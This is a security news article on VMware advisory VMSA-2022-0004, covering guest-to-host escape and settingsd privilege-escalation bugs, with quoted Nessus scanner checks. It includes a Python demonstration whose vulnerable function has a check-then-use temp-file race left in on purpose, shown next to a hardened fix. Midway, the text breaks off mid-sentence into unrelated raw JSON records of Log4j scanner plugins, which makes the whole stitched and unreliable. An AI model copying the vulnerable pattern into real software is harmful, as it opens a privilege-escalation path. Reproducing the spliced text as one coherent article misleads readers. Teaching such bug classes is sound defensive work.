VMware has issued a critical security update to address issues in its ESXi, Fusion and Workstation products, and in the VMware Cloud Foundation releases that bundle them. The bugs allow an attacker who already controls a guest virtual machine to break out of it and run code on the hypervisor host, where every other workload on that host lives.
The bugs score between 5.3 and 8.4 out of 10 on the CVSS vulnerability-severity scale, making them individually “important” or “moderate” issues. However, the virtualization giant noted that they can be chained together for worse outcomes: “Combining these issues may result in higher severity, hence the severity of this [advisory] is at severity level critical.”
VMware noted that patching VMware ESXi, Fusion and Workstation is the fastest method to resolve the issues, but organizations could also remove USB controllers from their VMs as a workaround for the two USB-controller bugs. However, “that may be infeasible at scale…and does not eliminate the potential threat like patching does,” according to the advisory, [issued Tuesday](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>).
The issues are as follows:
* **CVE-2021-22040:** Use-after-free vulnerability in XHCI USB controller (CVSS 8.4)
* **CVE-2021-22041:** Double-fetch vulnerability in UHCI USB controller (CVSS 8.4)
* **CVE-2021-22042:** ESXi ‘settingsd’ unauthorized access vulnerability (CVSS 8.2)
* **CVE-2021-22043:** ESXi ‘settingsd’ TOCTOU vulnerability (CVSS 8.2)
* **CVE-2021-22050:** ESXi slow HTTP POST denial of service vulnerability (CVSS 5.3)
## **USB Controller Bugs**
The first two important-rated issues (CVE-2021-22040, CVE-2021-22041) are found in the emulated USB controllers (XHCI and UHCI) of VMware ESXi, Fusion and Workstation. If exploited, a malicious actor with local administrative privileges inside a virtual machine (VM) would be able to execute code as that VM’s VMX process running on the host. This is a guest-to-host escape: the attacker starts with nothing more than admin rights in a guest and ends up running code in a host process.
The VMX process (vmware-vmx) is the per-VM process that implements the VM’s virtual devices and handles input/output (I/O) to devices that are not critical to performance, according to VMware’s [documentation](<https://blogs.vmware.com/vsphere/2019/07/the-vmotion-process-under-the-hood.html>). On ESXi it runs as a user-world process on top of the VMkernel rather than inside the kernel itself, which is why the two settingsd bugs below matter: they are the second step that turns VMX-level code execution into broader host compromise.
## **‘settingsd’ Security Flaws**
The next two issues, also rated important (CVE-2021-22042, CVE-2021-22043), affect the ESXi ‘settingsd’ service, which is responsible for settings and host logs, among other things.
The first involves the VMX process having unauthorized access to settingsd authorization tickets. That means a malicious actor who has gained code execution inside the VMX process (for example via one of the USB-controller bugs above) could talk to the settingsd service, which runs as a high-privileged user.
The second, a time-of-check/time-of-use (TOCTOU) race, can be chained with the first. It exists in the way settingsd handles temporary files: the service checks a file path and then uses it as two separate, non-atomic steps, so an attacker who already reaches settingsd can change what that path refers to in between and make the service write attacker-chosen files. According to VMware, this lets the attacker escalate privileges by writing arbitrary files.
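The following is an added illustration of the bug class named above, not VMware’s settingsd code and not a reproduction of the actual flaw. It shows a temporary-file write that checks a predictable path and then opens it (the race window), a hook that stands in for an attacker winning the race by dropping a symlink at that path, and the hardened variant that removes the window entirely. The directory layout, file names and the `attacker_swaps_in` hook are constructed for the demonstration; it assumes a POSIX system (Linux or macOS) where `os.symlink` and `O_NOFOLLOW` are available.

```python
"""Check-then-use race on a predictable temporary file, and the fix.

Added example, not VMware code. `attacker_swaps_in` is a constructed hook that
models an attacker winning the race between the existence check and open().
"""
import os
import stat
import tempfile


def vulnerable_write(tmp_path, data, attacker_swaps_in=None):
    """Time of check: make sure nothing is at tmp_path.
    Time of use: open and write it.  These two steps are not atomic, so an
    attacker who can create a symlink at tmp_path in between redirects the
    privileged write to any file of their choosing."""
    if os.path.lexists(tmp_path):               # time of check
        raise FileExistsError(tmp_path)
    if attacker_swaps_in is not None:           # simulated race win (constructed)
        os.symlink(attacker_swaps_in, tmp_path)
    with open(tmp_path, "wb") as f:             # time of use: follows the symlink
        f.write(data)


def hardened_write(tmp_path, data, attacker_swaps_in=None):
    """Create the file atomically instead of checking first.
    O_EXCL fails with EEXIST if anything (including a symlink) is already at
    the path, and O_NOFOLLOW refuses to traverse a symlink, so there is no
    check/use gap to win.  After opening, verify the descriptor really is a
    regular file we own before writing.  tempfile.mkstemp() does the same
    with a random name and is the normal choice in Python."""
    if attacker_swaps_in is not None:           # same simulated race win
        os.symlink(attacker_swaps_in, tmp_path)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(tmp_path, flags, 0o600)
    try:
        st = os.fstat(fd)                       # check the fd, not the path
        if (not stat.S_ISREG(st.st_mode)
                or st.st_uid != os.geteuid()
                or st.st_nlink != 1):
            raise PermissionError("unexpected file at %s" % tmp_path)
        os.write(fd, data)
    finally:
        os.close(fd)


def demo():
    """Run both variants in a private scratch directory and report whether a
    victim file was clobbered through the symlink, plus whether the hardened
    variant still works when there is no attacker.  Returns a dict of bools."""
    results = {}
    payload = b"attacker-controlled\n"
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.conf")
        for name, fn in (("vulnerable", vulnerable_write),
                         ("hardened", hardened_write)):
            with open(victim, "wb") as f:
                f.write(b"original\n")
            tmp = os.path.join(d, name + ".tmp")   # predictable temp name
            try:
                fn(tmp, payload, attacker_swaps_in=victim)
            except OSError:
                pass                                 # hardened path refuses
            with open(victim, "rb") as f:
                results[name + "_clobbered"] = f.read() != b"original\n"
        clean = os.path.join(d, "clean.tmp")
        hardened_write(clean, payload)
        with open(clean, "rb") as f:
            results["hardened_normal_write_ok"] = f.read() == payload
    return results


if __name__ == "__main__":
    print(demo())
```

The point of `hardened_write` is that it never asks “is there a file here?” and then acts on the answer. The kernel answers and acts in a single `open()` call, and the follow-up checks are made on the descriptor that was actually opened, not on the path, so an attacker who swaps the path out at any moment gains nothing.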
## **Moderate Flaw in ESXi**
The final bug (CVE-2021-22050) is the lone “moderate” vulnerability in the group. It only affects the ESXi platform and could allow adversaries to create a denial-of-service (DoS) condition on hosts by overwhelming the “rhttpproxy” service with multiple slow HTTP POST requests, the kind of request that opens a connection and then trickles the body in so slowly that the server’s connection handling is tied up.
A successful exploit requires that the malicious actors already have network access to ESXi, according to the vendor, which is one more reason the ESXi management interface should never be exposed beyond a dedicated management network.
This is the second major patch release this year affecting [this particular trio of products](<https://threatpost.com/unpatched-vmware-bug-hypervisor-takeover/177428/>). Full details of which patches should be applied to remediate the dangers are available in VMware’s [advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0004.html>).
The company said that so far, no in-the-wild attacks have been seen targeting the bugs, though that is likely to quickly change if [past is prelude](<https://threatpost.com/linux-variant-of-hellokitty-ransomware-targets-vmware-esxi-servers/167883/>), so admins should patch quickly.
## **Scanner Coverage**

Tenable published three Nessus plugins for VMSA-2022-0004. All three are version-based checks: as each plugin notes, “Nessus has not tested for these issues but has instead relied only on the application’s self-reported version number.” The vulnerability and patch publication date recorded in all three is 2022/02/15, each lists the exploitability as “No known exploits are available,” and each carries the cross-reference IAVA 2022-A-0089.

* **Plugin 158494, “ESXi 6.5 / 6.7 / 7.0 Multiple Vulnerabilities (VMSA-2022-0004)”** (remote check, published 2022-03-01, last modified 2022-05-06). Covers CVE-2021-22040, CVE-2021-22041, CVE-2021-22042, CVE-2021-22043 and CVE-2021-22050. CVSSv3 is scored from CVE-2021-22042 (`CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`); CVSSv2 from CVE-2021-22043. The plugin deliberately does not evaluate the USB-controller workaround, since the settingsd and rhttpproxy bugs have no workaround. It compares the host’s reported build number against the fixed build for its release:

```nasl
var fixes = make_array(
  '6.5', 19092475,  # ESXi650-202202401-SG
  '6.7', 18828794,  # ESXi670-202111101-SG
  '7.0', 19193900   # ESXi70U3c-19193900
);

# Note there are three updates for 7.0 with the update for 7.0 U3 being the lowest build number
# 7.0 U1 - 1e - ESXi70U1e-19324898
# 7.0 U2 - 2e - ESXi70U2e-19290878
# 7.0 U3 - 3c - ESXi70U3c-19193900

match = pregmatch(pattern:"^VMware ESXi.*build-([0-9]+)$", string:rel);
var build = int(match[1]);
if (build >= fixed_build) audit(AUDIT_INST_VER_NOT_VULN, 'VMware ESXi', ver + ' build ' + build);
```

  Note the caveat in the plugin’s own comment: for ESXi 7.0 it uses the lowest of the three fixed builds (U3c, 19193900) as a single threshold, so a 7.0 U1 or U2 host with a build above 19193900 but below its own line’s fix would not be flagged. Check 7.0 hosts against the fix for their specific update level.

* **Plugin 158147, “VMware Fusion 12.0.x < 12.2.1 Multiple Vulnerabilities (VMSA-2022-0004)”** (local macOS check, published 2022-02-18). Covers CVE-2021-22040 and CVE-2021-22041; fix is Fusion 12.2.1 or later. CVSSv3 scored from CVE-2021-22041 (`CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H`). References VMware KB 87349 (the USB-controller workaround).

* **Plugin 158148, “VMware Workstation 16.0.x < 16.2.1 Multiple Vulnerabilities (VMSA-2022-0004)”** (local check, Windows and Linux installs, published 2022-02-18). Same two CVEs and the same CVSSv3 vector; fix is Workstation 16.2.1 or later. Also references KB 87349.

The Fusion and Workstation plugins only report when paranoid reporting (`Settings/ParanoidReport`) is enabled. The reason is stated in the Workstation plugin source (“Cannot check if USB controllers are being used”): a version check cannot tell whether any VM on the host actually has a USB controller attached, which is the condition the workaround removes, so without paranoid mode a patched-by-workaround host would otherwise be reported as vulnerable.
In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://opensearch.org/blog/releases/2021/12/update-to-1-2-1/\");\n # https://vuxml.freebsd.org/freebsd/4b1ac5a3-5bd4-11ec-8602-589cfc007716.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?036fbe2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opensearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'opensearch<1.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:21:42", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log 
messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:esm", "p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java"], "id": "UBUNTU_USN-5192-2.NASL", "href": "https://www.tenable.com/plugins/nessus/156161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5192-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156161);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"USN\", value:\"5192-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0597\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5192-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:esm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. 
/ NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'liblog4j2-java', 'pkgver': '2.4-2ubuntu0.1~esm1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j2-java');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:07:36", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging 
library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:40", "description": "A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. 
A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:horizon"], "id": "VMWARE_HORIZON_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156560", "sourceData": "Binary data vmware_horizon_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:44", "description": "Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. 
(CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/o:cisco:sd-wan_firmware", "cpe:/a:cisco:sd-wan_vmanage"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control 
log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/16\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\", \"Cisco/Viptela/Model\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '20.3', 'fix_ver' : '20.3.4.1' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.2.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1.1' },\n { 'min_ver' : '20.6', 'fix_ver' : '20.6.2.1' }\n];\n\n \nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCwa47745',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:36:45", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1577-1 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is 
enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1577-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j", "p-cpe:/a:novell:opensuse:log4j-javadoc", "p-cpe:/a:novell:opensuse:log4j-jcl", "p-cpe:/a:novell:opensuse:log4j-slf4j", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1577.NASL", "href": "https://www.tenable.com/plugins/nessus/156146", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1577-1. 
